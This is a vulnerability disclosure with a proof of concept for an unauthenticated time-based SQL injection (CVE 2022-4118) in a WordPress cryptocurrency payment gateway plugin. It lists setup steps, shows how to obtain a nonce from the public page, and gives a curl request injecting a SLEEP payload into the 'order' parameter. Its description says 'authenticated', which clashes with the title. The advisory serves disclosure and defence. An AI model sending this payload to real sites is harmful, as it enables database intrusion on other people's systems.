Bitcoin / AltCoin Payment Gateway < 1.7.3 – Unauthenticated SQLi | CVE 2022-4118

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by authenticated users

Proof of Concept

Setup:

1. Install woocommerce (dependency, no setup required)
2. Install the vulnerable plugin (woo-altcoin-payment-gateway version 1.7.1)
3. In the AltCoin Payment settings, enable the AltCoin payment gateway (/wp-admin/admin.php?page=cs-woo-altcoin-gateway-settings)
4. Add a new coin (/wp-admin/admin.php?page=cs-woo-altcoin-add-new-coin), with the following dummy values:

Payment Confirmation Type: Manual
Enter Coin Name: Bitcoin
Enter Coin Wallet Address: 1KPLgee6crr7u1KQxwnnu4isizufxadVPZ
Active / Deactivate: checked

Attack:

1. As an unauthenticated user, visit the main page of the WordPress instance to extract the nonce - CTRL+F for "cs_token"
2. Invoke the following curl command, with the just obtained nonce, to induce a 5 second sleep:

time curl 'https://example.com/wp-admin/admin-ajax.php?action=_cs_wapg_custom_call&cs_token=<NONCE>&order=(CASE%20WHEN%20(1=1)%20THEN%20SLEEP(5)%20ELSE%201%20END)' \
    --data 'method=admin\options\functions\Coin_List@prepare_items'